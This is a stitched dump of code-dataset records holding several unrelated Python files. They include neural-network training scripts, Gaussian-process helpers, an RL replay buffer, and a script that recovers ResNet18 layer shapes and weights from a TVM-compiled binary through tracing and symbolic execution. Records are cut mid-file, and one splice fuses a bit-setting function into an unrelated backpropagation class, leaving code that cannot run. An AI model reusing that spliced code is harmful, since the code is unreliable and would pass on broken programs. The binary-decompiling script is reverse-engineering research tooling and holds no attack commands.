loss = weights * self.ce(output, target)\n loss = loss.mean()\n\n return loss\n\n","sub_path":"bias_loss/biasloss.py","file_name":"biasloss.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"390008962","text":"__author__ = 'Christin'\r\n\r\n\r\ndef set_bit(v, index):\r\n return (v|(1< 0):\n return 1\n else:\n return 0\n\n def testing(self, test):\n corect = 0\n for data in test:\n y1, y2 = self.forward(data)\n result = 0\n if y1 >= y2:\n result = 1\n else:\n result = 2\n if result == data[-1]:\n corect += 1\n return corect/len(test)\n\n def zScoreNormalize(self, dataset):\n num_data = len(dataset)\n num_feature = len(dataset[0])-1\n new_set = np.zeros(dataset.shape)\n for i in range(num_data):\n for j in range(num_feature):\n new_set[i][j] = (dataset[i][j] - self.mean[j]) / self.sd[j]\n new_set[i][-1] = dataset[i][-1]\n return new_set\n\nif __name__ == '__main__':\n accuracy = []\n np.set_printoptions(precision=3)\n bp = BackPropagation('iris_data_set/iris.data')\n for i in range(10):\n bp.randomSplitData(train_size=0.7)\n bp.train = bp.zScoreNormalize(bp.train)\n bp.test = bp.zScoreNormalize(bp.test)\n errors = bp.training(bp.train, epoche=3500, learning_rate=0.01)\n accuracy.append(bp.testing(bp.test))\n print ('Round', i+1,'accuracy:', accuracy[i])\n plt.plot(errors, label='Round' + str(i+1))\n print ('Average accuracy:', np.array(accuracy).mean())\n plt.ylabel('MSE')\n plt.xlabel('epoche')\n plt.legend(bbox_to_anchor=(1.05, 1), loc=2, borderaxespad=0.)\n plt.show()\n","sub_path":"backpropagation_ReLU.py","file_name":"backpropagation_ReLU.py","file_ext":"py","file_size_in_byte":4470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"26750536","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 21 16:47:00 2020\n\n@author: Katharina Rath\n\"\"\"\n\nimport numpy as np\nfrom scipy.optimize import newton\nfrom scipy.linalg import solve_triangular\nimport scipy\nfrom sklearn.metrics import mean_squared_error \nfrom fortran.sympgpr import sympgpr\nfrom scipy.sparse.linalg import eigsh\nfrom kernels import *\n\ndef f_kern(x, y, x0, y0, l):\n return kern_num(x,y,x0,y0,l[0], l[1])\n\ndef d2kdxdx0(x, y, x0, y0, l):\n return d2kdxdx0_num(x,y,x0,y0,l[0], l[1])\n\ndef d2kdydy0(x, y, x0, y0, l):\n return d2kdydy0_num(x,y,x0,y0,l[0], l[1])\n\ndef d2kdxdy0(x, y, x0, y0, l):\n return d2kdxdy0_num(x,y,x0,y0,l[0], l[1])\n\ndef d2kdydx0(x, y, x0, y0, l):\n return d2kdxdy0(x, y, x0, y0, l)\n\ndef build_K(xin, x0in, hyp, K):\n # set up covariance matrix with derivative observations, Eq. (38)\n N = K.shape[0]//2\n N0 = K.shape[1]//2\n x0 = x0in[0:N0]\n x = xin[0:N]\n y0 = x0in[N0:2*N0]\n y = xin[N:2*N]\n sympgpr.build_k(x, y, x0, y0, hyp, K)\n \ndef buildKreg(xin, x0in, hyp, K):\n # set up \"usual\" covariance matrix for GP on regular grid (q,p)\n N = K.shape[0]\n N0 = K.shape[1]\n x0 = x0in[0:N0]\n x = xin[0:N]\n y0 = x0in[N0:2*N0]\n y = xin[N:2*N]\n sympgpr.buildkreg(x, y, x0, y0, hyp, K)\n \ndef build_dKreg(xin, x0in, hyp):\n\n l = hyp[:-1]\n sig = hyp[-1]\n N = len(xin)//2\n N0 = len(x0in)//2\n x0 = x0in[0:N0]\n x = xin[0:N]\n y0 = x0in[N0:2*N0]\n y = xin[N:2*N]\n Kp = np.empty((N, N0))\n \n dK = []\n for k in range(N):\n for lk in range(N0):\n Kp[k,lk] = sig*dkdlx_num(\n x0[lk], y0[lk], x[k], y[k], l[0], l[1]) \n\n dK.append(Kp.copy())\n\n for k in range(N):\n for lk in range(N0):\n Kp[k,lk] = sig*dkdly_num(\n x0[lk], y0[lk], x[k], y[k], l[0], l[1]) \n\n dK.append(Kp.copy())\n return dK\n\ndef build_dK(xin, x0in, hyp):\n # set up covariance matrix\n N = len(xin)//2\n N0 = len(x0in)//2\n l = hyp[:-1]\n sig = hyp[-1]\n x0 = x0in[0:N0]\n x = xin[0:N]\n y0 = x0in[N0:2*N0]\n y = xin[N:2*N]\n k11 = np.empty((N0, N))\n k12 = np.empty((N0, N))\n k21 = np.empty((N0, N))\n k22 = np.empty((N0, N))\n\n dK = []\n \n for k in range(N0):\n for lk in range(N):\n k11[k,lk] = sig*d3kdxdx0dlx_num(\n x0[k], y0[k], x[lk], y[lk], l[0], l[1]) \n k21[k,lk] = sig*d3kdxdy0dlx_num(\n x0[k], y0[k], x[lk], y[lk], l[0], l[1]) \n k12[k,lk] = sig*d3kdxdy0dlx_num(\n x0[k], y0[k], x[lk], y[lk], l[0], l[1]) \n k22[k,lk] = sig*d3kdydy0dlx_num(\n x0[k], y0[k], x[lk], y[lk], l[0], l[1]) \n \n dK.append(np.vstack([\n np.hstack([k11, k12]),\n np.hstack([k21, k22])\n ]))\n\n for k in range(N0):\n for lk in range(N):\n k11[k,lk] = sig*d3kdxdx0dly_num(\n x0[k], y0[k], x[lk], y[lk], l[0], l[1]) \n k21[k,lk] = sig*d3kdxdy0dly_num(\n x0[k], y0[k], x[lk], y[lk], l[0], l[1]) \n k12[k,lk] = sig*d3kdxdy0dly_num(\n x0[k], y0[k], x[lk], y[lk], l[0], l[1]) \n k22[k,lk] = sig*d3kdydy0dly_num(\n x0[k], y0[k], x[lk], y[lk], l[0], l[1]) \n \n dK.append(np.vstack([\n np.hstack([k11, k12]),\n np.hstack([k21, k22])\n ]))\n #dK[:,:] = sig*dK\n return dK\n \n\ndef nll_grad_reg(hyp, x, y, N):\n K = np.empty((N, N), order = 'F')\n buildKreg(x, x, hyp[:-1], K)\n Ky = K + np.abs(hyp[-1])*np.diag(np.ones(N))\n Kyinv = np.linalg.inv(Ky) # invert GP matrix\n alpha = Kyinv.dot(y)\n nlp_val = 0.5*y.T.dot(alpha) + 0.5*np.linalg.slogdet(Ky)[1]\n dK = build_dKreg(x, x, hyp[:-1])\n\n nlp_grad = np.array([\n -0.5*alpha.T.dot(dK[0].dot(alpha)) + 0.5*np.trace(Kyinv.dot(dK[0])),\n -0.5*alpha.T.dot(dK[1].dot(alpha)) + 0.5*np.trace(Kyinv.dot(dK[1]))\n ])\n\n return nlp_val, nlp_grad\n\ndef nll_grad(hyp, x, y, N):\n K = np.empty((N, N), order = 'F')\n build_K(x, x, hyp[:-1], K)\n Ky = K + np.abs(hyp[-1])*np.diag(np.ones(N))\n Kyinv = np.linalg.inv(Ky) # invert GP matrix\n alpha = Kyinv.dot(y)\n nlp_val = 0.5*y.T.dot(alpha) + 0.5*np.linalg.slogdet(Ky)[1]\n dK = build_dK(x, x, hyp[:-1])\n\n nlp_grad = np.array([\n -0.5*alpha.T.dot(dK[0].dot(alpha)) + 0.5*np.trace(Kyinv.dot(dK[0])),\n -0.5*alpha.T.dot(dK[1].dot(alpha)) + 0.5*np.trace(Kyinv.dot(dK[1]))\n ])\n\n return nlp_val, nlp_grad\n\n\ndef gpsolve(Ky, ft):\n L = scipy.linalg.cholesky(Ky, lower = True)\n alpha = solve_triangular(\n L.T, solve_triangular(L, ft, lower=True, check_finite=False), \n lower=False, check_finite=False)\n\n return L, alpha\n\n# compute log-likelihood according to RW, p.19\ndef solve_cholesky(L, b):\n return solve_triangular(\n L.T, solve_triangular(L, b, lower=True, check_finite=False), \n lower=False, check_finite=False)\n\n# negative log-posterior\ndef nll_chol_reg(hyp, x, y, N):\n K = np.empty((N, N), order='F')\n buildKreg(x, x, hyp[:-1], K)\n Ky = K + np.abs(hyp[-1])*np.diag(np.ones(N))\n L = scipy.linalg.cholesky(Ky, lower = True)\n alpha = solve_cholesky(L, y)\n ret = 0.5*y.T.dot(alpha) + np.sum(np.log(L.diagonal()))\n return ret\n# negative log-posterior\ndef nll_chol(hyp, x, y, N):\n neig = len(x)\n K = np.empty((N, N), order='F')\n build_K(x, x, hyp[:-1], K)\n Ky = K + np.abs(hyp[-1])*np.diag(np.ones(N))\n try:\n L = scipy.linalg.cholesky(Ky, lower = True, check_finite = False)\n alpha = solve_cholesky(L, y)\n ret = 0.5*y.T.dot(alpha) + np.sum(np.log(L.diagonal()))\n return ret\n except:\n print('Warning! Fallback to eig solver!')\n w, Q = eigsh(Ky, neig, tol=max(1e-6*np.abs(hyp[-1]), 1e-15))\n alpha = Q.dot(np.diag(1.0/w).dot(Q.T.dot(y))) \n ret = 0.5*y.T.dot(alpha) + 0.5*(np.sum(np.log(w)) + (len(x)-neig)*np.log(np.abs(hyp[-1])))\n return ret\n\n\ndef guessP(x, y, hypp, xtrainp, ztrainp, Kyinvp):\n Ntrain = len(xtrainp)//2\n return sympgpr.guessp(\n x, y, hypp, xtrainp[0:Ntrain], xtrainp[Ntrain:], ztrainp, Kyinvp)\n\n\ndef calcQ(x,y, xtrain, l, Kyinv, ztrain):\n Ntrain = len(xtrain)//2\n return sympgpr.calcq(\n x, y, xtrain[:Ntrain], xtrain[Ntrain:], l, Kyinv, ztrain)\n\ndef calcP(x,y, l, hypp, xtrainp, ztrainp, Kyinvp, xtrain, ztrain, Kyinv):\n Ntrain = len(xtrain)//2\n Ntrainp = len(xtrainp)//2\n return sympgpr.calcp(x, y, l, hypp, xtrainp[:Ntrainp], xtrainp[Ntrainp:],\n ztrainp, Kyinvp, xtrain[:Ntrain], xtrain[Ntrain:], ztrain, Kyinv)\n\n\ndef applymap(nm, Ntest, l, hypp, Q0map, P0map, xtrainp, ztrainp, Kyinvp, xtrain, ztrain, Kyinv):\n # Application of symplectic map\n \n pmap = np.zeros([nm, Ntest])\n qmap = np.zeros([nm, Ntest])\n #set initial conditions\n pmap[0,:] = P0map\n qmap[0,:] = Q0map\n \n # loop through all test points and all time steps\n for i in range(0,nm-1):\n for k in range(0, Ntest): \n # set new P including Newton for implicit Eq (42)\n pmap[i+1, k] = calcP(qmap[i,k], pmap[i, k], l, hypp, xtrainp, ztrainp, Kyinvp, xtrain, ztrain, Kyinv)\n for k in range(0, Ntest):\n if np.isnan(pmap[i+1, k]):\n qmap[i+1,k] = np.nan\n else: \n # then: set new Q via calculating \\Delta q and adding q (Eq. (43))\n qmap[i+1, k] = calcQ(qmap[i,k], pmap[i+1,k], xtrain, l, Kyinv, ztrain)\n qmap[i+1, k] = np.mod(qmap[i+1,k] + qmap[i, k], 2.0*np.pi)\n return qmap, pmap\n\ndef quality(qmap, pmap, H, ysint, Ntest):\n #geom. distance\n gd = np.zeros([Ntest]) \n for lk in range(0,Ntest):\n gd[lk] = mean_squared_error(([qmap[1, lk], pmap[1, lk]]),ysint[:, lk, 1])\n stdgd = np.std(gd[:])\n # Energy oscillation\n Eosc = np.zeros([Ntest])\n for lk in range(0, Ntest):\n Eosc[lk] = np.std(H[:,lk])/np.mean(H[:,lk])\n return Eosc, gd, stdgd\n\n\n","sub_path":"python/02_pert_pendulum/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":8009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"325907183","text":"#! /usr/bin/python3\nimport copy\nimport os\nimport sys\nsys.path.append(\"../..\")\nimport trace_filter\nimport utils\nimport se_engine\nfrom utils import list_to_json, dict_to_json, json_to_list, json_to_dict\nimport logging\nimport math\nprint('get logger: {}'.format('decompiler.'+__name__))\nlogger = logging.getLogger('decompiler.'+__name__)\n\n\nif __name__ == '__main__':\n utils.funcs_dir = \"/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/resnet18_funcs/\"\n prog_path = \"/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/resnet18_tvm_O3_strip\"\n in_data = \"/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/cat.bin\"\n log_path = \"/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/func_call.log\"\n label_file = \"/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/label.txt\"\n\n if len(sys.argv) == 6:\n utils.funcs_dir = sys.argv[1]\n prog_path = sys.argv[2]\n in_data = sys.argv[3]\n log_path = sys.argv[4]\n label_file = sys.argv[5]\n\n tmp_log_path = './inst_trace.log'\n exp_log_path = './mem_exp.log'\n mem_read_log_path = './mem_read.log'\n mem_write_log_path = './mem_write.log'\n mem_dump_log_path = 'mem_dump.log'\n\n # ==============================================================\n # Step 1 --- Get the Sequence of Layers ---\n # ==============================================================\n # get_funcs_trace(prog_path, in_data, log_path, label_file, only_fused=False)\n \n utils.get_funcs_trace(prog_path, in_data, log_path, label_file, compiler='tvm')\n utils.print_layer_label_tvm(log_path)\n utils.get_funcs_trace(prog_path, in_data, log_path, label_file, compiler='tvm', only_fused=True)\n utils.print_layer_label_tvm(log_path, config_path='config.json', only_fused=True)\n func_meta_data, topo_list = utils.print_input_id(log_path) # to reconstruct the conputational graph\n #exit(0)\n \n # ==============================================================\n # Step 2 --- Recover the Shape of each Layer\n # ==============================================================\n \n # Step 2.1 Generate and Filter Trace\n \n logger.info('START')\n func_trace_map = {}\n func_rndaddr_map = {}\n asm_files = os.listdir(utils.funcs_dir)\n for asm_file in asm_files:\n if 'labels' not in asm_file and asm_file.endswith('.txt'):\n asm_path = os.path.join(utils.funcs_dir, asm_file)\n start_addr, _ = utils.get_func_range(asm_path)\n if start_addr in utils.addr2label.keys():\n if 'dense' in utils.addr2label[start_addr] or 'conv' in utils.addr2label[start_addr]:\n trace_path = os.path.join(os.path.dirname(log_path), asm_file.replace('.txt', '.log'))\n slice_log, rnd_addr, loop_size, start_addr, end_addr = \\\n trace_filter.get_trace(asm_path, prog_path, in_data, trace_path, compiler='tvm')\n func_trace_map[asm_file] = slice_log\n func_rndaddr_map[asm_file] = (rnd_addr, loop_size, start_addr, end_addr)\n \n # print(func_trace_map)\n # print(func_rndaddr_map)\n logger.info('END')\n #exit(0)\n \n\n # ==============================================================\n\n # Step 2.2 Recover Shape with Symbolic Execution\n # Step 2.2.1 Conv and Matmul layers\n\n # func_trace_map = {'0099.txt': '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0099_slice.log',\n # '0093.txt': '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0093_slice.log',\n # '0090.txt': '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0090_slice.log',\n # '0087.txt': '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0087_slice.log',\n # '0082.txt': '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0082_slice.log',\n # '0079.txt': '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0079_slice.log',\n # '0076.txt': '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0076_slice.log',\n # '0073.txt': '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0073_slice.log',\n # '0055.txt': '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0055_slice.log',\n # '0053.txt': '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0053_slice.log',\n # '0050.txt': '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0050_slice.log',\n # '0045.txt': '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0045_slice.log',\n # '0038.txt': '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0038_slice.log',\n # '0035.txt': '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0035_slice.log',\n # '0032.txt': '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0032_slice.log',\n # '0029.txt': '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0029_slice.log',\n # '0026.txt': '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0026_slice.log',\n # '0019.txt': '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0019_slice.log',\n #\n # '0047.txt': '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0047_slice.log',\n # }\n\n # func_rndaddr_map = {'0099.txt': ('0x38c930c', 64, '0x445700', '0x44849E'),\n # '0093.txt': ('0x33b8a44', 64, '0x441810', '0x443FCC'),\n # '0090.txt': ('0x32fe3dc', 64, '0x43d860', '0x440CD2'),\n # '0087.txt': ('0x32fd184', 64, '0x439780', '0x43CB33'),\n # '0082.txt': ('0x33b8b4c', 64, '0x4357e0', '0x437F34'),\n # '0079.txt': ('0x32fdac8', 64, '0x4317f0', '0x434E48'),\n # '0076.txt': ('0x33b8f80', 64, '0x42d4b0', '0x430922'),\n # '0073.txt': ('0x32fd478', 64, '0x42ac80', '0x42C631'),\n # '0055.txt': ('0x3486fb0', 64, '0x423b40', '0x42590E'),\n # '0053.txt': ('0x33b88fc', 64, '0x420690', '0x423304'),\n # '0050.txt': ('0x33b8bbc', 64, '0x41d1a0', '0x41F8B6'),\n # '0045.txt': ('0x33b8998', 64, '0x419480', '0x41BE7D'),\n # '0038.txt': ('0x38c91f8', 64, '0x414870', '0x41800E'),\n # '0035.txt': ('0x32fd4f0', 64, '0x4101e0', '0x413838'),\n # '0032.txt': ('0x32fd1fc', 64, '0x40be20', '0x40F1BD'),\n # '0029.txt': ('0x33b8a3c', 64, '0x408960', '0x40B33C'),\n # '0026.txt': ('0x33b8b40', 64, '0x405410', '0x407D41'),\n # '0019.txt': ('0x47f7d84', 64, '0x401d70', '0x403E3E'),\n #\n # '0047.txt': ('0x65c58c0', 64, '0x41c3d0', '0x41C806'),\n # }\n\n #se_engine.extern_functions = {'0x400c10': 'memset'}\n #utils.generate_symbolic_expression('0038.txt', '/home/lifter/Documents/DL_compiler/BTD_DATA/TVM-v0.7/resnet18_tvm_O3/0038_slice.log', exp_log_path, max_inst=5000000)\n #shape = utils.recover_shape_tvm('0038.txt', exp_log_path, mem_read_log_path, mem_write_log_path, prog_path, in_data, func_type='conv2d', optimized=True)\n #print(shape)\n #exit(0)\n # We have to pass the external function address to SE engine\n # This can be done automatically, but we do it manually for simplicity\n \n se_engine.extern_functions = {'0x400c10': 'memset'} # address in .plt, name\n func_shape = utils.handle_all_conv(prog_path, in_data, label_file, func_trace_map, compiler='tvm', optimized=True, topo_list=topo_list) # also all dense\n print('all conv and dense done.')\n for name, result in func_shape.items():\n print(name)\n for i in range(len(func_meta_data)):\n if func_meta_data[i][0] == name:\n func_meta_data[i][1] = result\n break\n if len(result) == 4:\n print('filter_shape', result[0])\n print('input_shape', result[1])\n print('output_shape', result[2])\n print('layout_shape', result[3])\n else:\n print(result)\n #exit(0)\n \n \n # ==============================================================\n \n # Step 2.2.2 Other layers\n # the BatchNorm2d is implemented with a special sequence (add, sqrt, divide, multiply, expand_dims, multiply, negative, multiply, add, expand_dims, add)\n \n asm_files = os.listdir(utils.funcs_dir)\n se_engine.extern_functions = {'0x400c10': 'memset'} # address in .plt, name\n results_dict = dict()\n utils.addr2label['0x444380'] = 'avg_pool2d' # manually fixed label\n for asm_file in asm_files:\n if 'labels' not in asm_file and asm_file.endswith('.txt'):\n asm_path = os.path.join(utils.funcs_dir, asm_file)\n start_addr, _ = utils.get_func_range(asm_path)\n if start_addr in utils.addr2label.keys():\n func_type = utils.addr2label[start_addr]\n\n if 'pool' in func_type: # `add` is merged in `conv2d`\n # transpose, expand_dims and relu could be ignored, batchnormalization always follow after a conv layer\n print('SE for {}, {}'.format(asm_file, func_type))\n tmp_log_path = os.path.basename(asm_file)[:-4] + '.log'\n # generate tmp trace file, it should be fast\n utils.generate_inst_trace(asm_file, tmp_log_path, prog_path, in_data, timeout=True)\n # symbolic execution, also should be fast\n utils.generate_symbolic_expression(asm_file, tmp_log_path, exp_log_path, max_inst=5000000)\n # --- try to interpret the filter shape from symbolic expression log\n shape = utils.recover_shape_tvm(asm_file, exp_log_path,\n mem_read_log_path, mem_write_log_path,\n prog_path, in_data, func_type=func_type, optimized=True)\n print('shape:', shape)\n results_dict[asm_file] = shape\n for name, result in results_dict.items():\n for i in range(len(func_meta_data)):\n if func_meta_data[i][0] == name:\n if isinstance(result, float):\n func_meta_data[i][1] = [1, int(result)]\n else:\n func_meta_data[i][1] = result\n break\n print(name)\n print(result)\n #exit(0)\n\n list_to_json(topo_list, './topo_list.json')\n dict_to_json(func_meta_data, './meta_data.json')\n\n # ==============================================================\n # Step 3 --- Extract Weights/Biases from Binary (dynamically)\n # ==============================================================\n\n func_meta_data = list(func_meta_data.values())\n new_meta_data = []\n logged_func = []\n for i in range(len(func_meta_data)):\n meta_data = func_meta_data[i]\n if meta_data[0] in logged_func:\n continue\n else:\n logged_func.append(meta_data[0])\n\n # identify the type of conv\n func_name = meta_data[0]\n conv_type = 0\n for node in topo_list:\n if 'conv2d' in node[2] and node[1] == func_name:\n conv_type = len(node[3])\n break\n\n # manually fix wrong labels\n if 'conv2d' in meta_data[3] and conv_type >= 3:\n meta_data[3] = 'conv2d, add, relu'\n\n if meta_data[3] == 'conv2d, add, relu':\n meta_data[6] = 1 if conv_type == 3 else 2\n meta_data[5] = int(meta_data[1][1][3] / meta_data[1][2][3])\n meta_data[4] = math.ceil((meta_data[1][1][3] - meta_data[1][2][3] * meta_data[5]) / 2)\n meta_data[3] = 'conv2d'\n new_meta_data.append(meta_data) # weights of conv\n meta_data = copy.deepcopy(meta_data)\n meta_data[6] = 2 if conv_type == 3 else 3\n meta_data[5] = meta_data[4] = None\n meta_data[3] = 'add'\n meta_data[1] = [1, int(meta_data[1][0][0])]\n new_meta_data.append(meta_data) # biases of conv\n elif 'dense' in meta_data[3]:\n meta_data[6] = 1\n new_meta_data.append(meta_data) # weights of dense\n meta_data = copy.deepcopy(meta_data)\n meta_data[6] = 2\n meta_data[3] = 'add'\n meta_data[1] = [1, int(meta_data[1][0])]\n new_meta_data.append(meta_data) # biases of dense\n\n # print for debug\n func_meta_data = new_meta_data\n for meta_data in func_meta_data:\n # manually fix wrongly predicted shapes\n if '0038.txt' in meta_data[0] and 'conv2d' in meta_data[3]:\n meta_data[1] = list(meta_data[1])\n meta_data[1][-1] = (2, 2, 3, 3, 32, 64)\n # manually fix wrongly parameter index\n if meta_data[0] in ['0055.txt', '0019.txt', '0073.txt']:\n meta_data[-1] -= 1\n if meta_data[6]:\n print(meta_data)\n dict_to_json(func_meta_data, './new_meta_data.json')\n # func_meta_data = [('0026.txt', (512, 512, 3, 3), '0x404810', 'conv2d', (16, 1, 3, 3, 512, 32), 1),\n # ('0029.txt', (512, 512, 3, 3), '0x407D60', 'conv2d', (16, 1, 3, 3, 512, 32), 1),\n # ('0032.txt', (256, 128, 3, 3), '0x40B360', 'conv2d', (8, 16, 3, 3, 8, 32), 1),\n # ('0035.txt', (128, 128, 3, 3), '0x40F1E0', 'conv2d', (4, 1, 3, 3, 128, 32), 2), # 'extra_add'\n # # wrong layout shape --> ('0038.txt', (128, 64, 3, 3), '0x413860', 'conv2d', (2, 8, 3, 3, 8, 64), 1),\n # # manually correct\n # ('0038.txt', (128, 64, 3, 3), '0x413860', 'conv2d', (2, 2, 3, 3, 32, 64), 1),\n # ('0045.txt', (512, 256, 3, 3), '0x418A00', 'conv2d', (16, 32, 3, 3, 8, 32), 1),\n # ('0050.txt', (256, 256, 3, 3), '0x41C830', 'conv2d', (16, 2, 3, 3, 128, 16), 1),\n # ('0053.txt', (512, 512, 3, 3), '0x41F8E0', 'conv2d', (16, 1, 3, 3, 512, 32), 2), # 'extra_add'\n # ('0055.txt', (256, 128, 1, 1), '0x423330', 'conv2d', (16, 2, 1, 1, 64, 16), 1), # 'extra_add'\n # ('0073.txt', (128, 64, 1, 1), '0x42A470', 'conv2d', (4, 8, 1, 1, 8, 32), 1), # 'extra_add'\n # ('0076.txt', (128, 128, 3, 3), '0x42C660', 'conv2d', (4, 1, 3, 3, 128, 32), 1),\n # ('0079.txt', (64, 64, 3, 3), '0x430940', 'conv2d', (2, 1, 3, 3, 64, 32), 2), # 'extra_add'\n # ('0082.txt', (256, 256, 3, 3), '0x434E70', 'conv2d', (16, 2, 3, 3, 128, 16), 1),\n # ('0087.txt', (128, 128, 3, 3), '0x438930', 'conv2d', (4, 1, 3, 3, 128, 32), 1),\n # ('0090.txt', (64, 64, 3, 3), '0x43CB60', 'conv2d', (2, 1, 3, 3, 64, 32), 1),\n # ('0093.txt', (256, 256, 3, 3), '0x440CF0', 'conv2d', (16, 2, 3, 3, 128, 16), 2), # 'extra_add'\n # # fixed # wrong layout shape --> # ('0099.txt', (64, 3, 7, 7), '0x444E30', 'conv2d', (2, 8, 7, 7, 0.375, 32)),\n # ('0099.txt', (64, 3, 7, 7), '0x444E30', 'conv2d', (2, 1, 7, 7, 3, 32), 1),\n # ('0019.txt', (512, 256, 1, 1), '0x401550', 'conv2d', (16, 2, 1, 1, 128, 32), 1), # 'extra_add'\n #\n # ('0026.txt', (1, 512), '0x404810', 'add', 2),\n # ('0029.txt', (1, 512), '0x407D60', 'add', 2),\n # ('0032.txt', (1, 256), '0x40B360', 'add', 2),\n # ('0035.txt', (1, 128), '0x40F1E0', 'add', 3), # 'extra_add'\n # ('0038.txt', (1, 128), '0x413860', 'add', 2),\n # ('0045.txt', (1, 512), '0x418A00', 'add', 2),\n # ('0050.txt', (1, 256), '0x41C830', 'add', 2),\n # ('0053.txt', (1, 512), '0x41F8E0', 'add', 3), # 'extra_add'\n # ('0055.txt', (1, 256), '0x423330', 'add', 2), # 'extra_add'\n # ('0073.txt', (1, 128), '0x42A470', 'add', 2), # 'extra_add'\n # ('0076.txt', (1, 128), '0x42C660', 'add', 2),\n # ('0079.txt', (1, 64), '0x430940', 'add', 3), # 'extra_add'\n # ('0082.txt', (1, 256), '0x434E70', 'add', 2),\n # ('0087.txt', (1, 128), '0x438930', 'add', 2),\n # ('0090.txt', (1, 64), '0x43CB60', 'add', 2),\n # ('0093.txt', (1, 256), '0x440CF0', 'add', 3), # 'extra_add'\n # ('0099.txt', (1, 64), '0x444E30', 'add', 2),\n # ('0019.txt', (1, 512), '0x401550', 'add', 2), # 'extra_add'\n #\n # ('0047.txt', (1000, 512), '0x41BEA0', 'dense', 1),\n # ('0047.txt', (1, 1000), '0x41BEA0', 'add', 2),\n # ]\n\n for fun_data in func_meta_data:\n func_name = fun_data[0]\n w_shape = fun_data[1]\n dump_point = fun_data[2]\n func_type = fun_data[3]\n data_index = fun_data[-1]\n layout_shape = ()\n if func_type == 'conv2d':\n layout_shape = fun_data[1][-1]\n w_shape = w_shape[0]\n layout_shape = [int(layout_shape[i]) for i in range(len(layout_shape))]\n w_shape = [int(w_shape[i]) for i in range(len(w_shape))]\n\n utils.extract_params_tvm(prog_path, in_data, w_shape, dump_point, mem_dump_log_path, func_name,\n func_type=func_type, data_idx=data_index, special_layout=layout_shape)\n","sub_path":"evaluation/resnet18_tvm_v07_O3/resnet18_tvm_O3_decompile.py","file_name":"resnet18_tvm_O3_decompile.py","file_ext":"py","file_size_in_byte":18145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"464108771","text":"import argparse\nimport os\nimport collections\nfrom torch.utils.tensorboard.writer import SummaryWriter\n\nimport tqdm\nfrom schedulers import multi_schedulers\nfrom queryast import HoleQuery\nimport random\n\nfrom torch.nn.utils.clip_grad import clip_grad_norm_\nfrom rl_agent import OdinsynthRLAgentWrapper\nimport numpy as np\nfrom rl_environment import OdinsynthEnv, OdinsynthEnvFactory, OdinsynthEnvStep, OdinsynthEnvWrapper\nfrom rl_utils import SumSegmentTree, MinSegmentTree\nfrom collections import deque\nfrom typing import Deque, Dict, List, Tuple\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\ndef linear_schedule(start_e: float, end_e: float, duration: int, t: int):\n slope = (end_e - start_e) / duration\n return max(slope * t + start_e, end_e)\n\n\nclass ReplayBuffer:\n \"\"\"A simple numpy replay buffer.\"\"\"\n\n def __init__(\n self, \n size: int, \n batch_size: int = 32, \n n_step: int = 1, \n gamma: float = 0.99\n ):\n self.obs_buf: List[OdinsynthEnvStep] = [None] * size\n self.next_obs_buf: List[OdinsynthEnvStep] = [None] * size\n self.acts_buf: List[int] = [None] * size\n self.rews_buf: List[float] = [None] * size\n self.done_buf: List[bool] = [None] * size\n self.max_size, self.batch_size = size, batch_size\n self.ptr, self.size, = 0, 0\n \n # for N-step Learning\n self.n_step_buffer = deque(maxlen=n_step)\n self.n_step = n_step\n self.gamma = gamma\n\n def store(\n self, \n obs: OdinsynthEnvStep, \n act : int, \n rew: float, \n next_obs: OdinsynthEnvStep, \n done: bool,\n ) -> Tuple[OdinsynthEnvStep, int, float, OdinsynthEnvStep, bool]:\n transition = (obs, act, rew, next_obs, done)\n self.n_step_buffer.append(transition)\n\n # single step transition is not ready\n if len(self.n_step_buffer) < self.n_step:\n return ()\n \n # make a n-step transition\n rew, next_obs, done = self._get_n_step_info(\n self.n_step_buffer, self.gamma\n )\n obs, act = self.n_step_buffer[0][:2]\n \n self.obs_buf[self.ptr] = obs\n 